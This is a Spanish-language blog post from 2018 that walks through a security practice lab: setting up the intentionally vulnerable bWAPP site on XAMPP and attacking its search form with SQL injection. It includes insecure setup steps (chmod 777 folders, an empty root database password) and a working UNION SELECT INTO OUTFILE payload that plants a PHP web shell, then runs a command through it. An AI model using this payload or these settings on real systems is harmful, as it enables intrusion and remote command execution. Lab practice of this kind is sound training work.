lunes, 7 de mayo de 2018

Práctica de seguridad: Ataque Injección SQL a Formulario Web




En esta práctica vamos a atacar a una website hospedada en nuestro ordenador a través de un formulario de búsqueda. Utilizaremos bWAPP, se trata de un website lleno de bugs expresamente para que podamos practicar.

El primer paso es instalar e iniciar un servidor web (Apache, MySQL, PHP) en nuestro ordenador , en este caso utilizaremos XAMP en una maquina Machintosh (Unix). Descargar aquí.

El siguente paso es instalar el website bWAPP: Descargar aquí.

A continuación configuraremos el servidor con el mínimo de seguridad para emular una mala configuración administrativa.

Dar todos los permisos a las carpetas:
  1. chmod 777 passwords/
    chmod 777 images/
    chmod 777 documents/
    chmod 777 logs/
Modificarmos el siguente archvivo settings.php de bWAPP y dejamos el password en blanco:
  1. // Database connection settings
    $db_server = "localhost";
    $db_username = "root";
    $db_password = "";
    $db_name = "bWAPP";
Y procedemos a instalar ejecutando el archivo install.php  ejemplo: http://localhost/bWAPP/install.phpy hacemos clic en "clic here to install",

ir a http://localhost/bWAPP/login.php y logearse con: bee/bug

                                             ________________________

Una vez concluida la instalación, podemos proceder a realizar la práctica:

Primer paso:
Seleccionamos en el desplegable este tipo de ataque: SQL Injection (GET/Search)

Nos llevará a un formulario de tipo entrada de datos (GET), en el cual probaremos el siguente ataque (sin entrar en detalle) el cual generará un archivo que devolverá un terminal desde la carpeta que suele tener premisos de escritura llamada /images :

  1. a' UNION SELECT 1, "<?php system($_GET['cmd']) ?>",1,1,1,1,1 INTO OUTFILE "/Applications/XAMPP/xamppfiles/htdocs/bWAPP/images/shell.php" -- -
     


la sentencia antearior generará un archivo con un script en PHP que nos devolverá un terminal de comandos.
Ejecutaremos el siguente comando de prueba desde la barra de búsqueda (ver resultado imagen inferior) se trata del comando "traceroute -m 3 google.com" que nos devolverá la ruta hasta la salida a Internet de la red atacada.

http://192.168.1.39/bWAPP/images/shell.php?cmd=traceroute%20-m%203%20google.com

No hay comentarios:

Publicar un comentario